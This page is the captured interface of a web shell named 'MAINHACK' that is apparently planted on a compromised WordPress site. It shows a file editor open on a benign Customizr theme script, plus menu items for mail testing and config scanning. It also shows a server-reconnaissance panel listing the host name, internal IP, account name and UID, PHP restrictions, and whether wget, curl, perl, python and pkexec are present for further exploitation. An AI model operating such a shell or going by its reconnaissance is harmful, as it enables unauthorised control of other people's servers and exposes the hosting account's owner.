[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: tc-init.js
// @global CZRParams // march 2020 : wp_footer js code to be minified // introduced for https://github.com/presscustomizr/nimble-builder/issues/626 ( function() { var _loading = false; _load = function() { if ( _loading ) return; jQuery( function() { var _headTag = document.getElementsByTagName('head')[0]; var _script = document.createElement("script"); _script.setAttribute('src', CZRParams.mainScriptUrl ); _script.setAttribute('id', 'tc-scripts' ); _script.setAttribute('defer', 'defer'); if ( _headTag ) { _headTag.appendChild(_script); } _loading = true; }); }; // recursively try to load jquery every 200ms during 6s ( max 30 times ) var _doWhenJqueryIsReady = function( attempts ) { attempts = attempts || 0; if ( typeof undefined !== typeof window.jQuery ) { _load(); } else if ( attempts < 30 ) { setTimeout( function() { attempts++; _doWhenJqueryIsReady( attempts ); }, 200 ); } else { console.log('Customizr problem : jQuery.js was not detected on your website'); } }; // if jQuery has already be printed, let's listen to the load event var jquery_script_el = document.querySelectorAll('[src*="wp-includes/js/jquery/jquery.js"]'); if ( jquery_script_el[0] ) { jquery_script_el[0].addEventListener('load', function() { _doWhenJqueryIsReady(); }); } try {_doWhenJqueryIsReady();} catch(er) { console.log('tc-init error', er ); } })();
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: webm010.cluster103.gra.hosting.ovh.net
Server IP: 10.103.20.10
PHP Version: 7.4.33
Server Software: Apache
System: Linux webm010.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
HDD Total: 14.32 GB
HDD Free: 8.45 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
Exists
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: cuisinesj
User ID (UID): 17129
Group ID (GID): 100
Script Owner UID: 17129
Current Dir Owner: 17129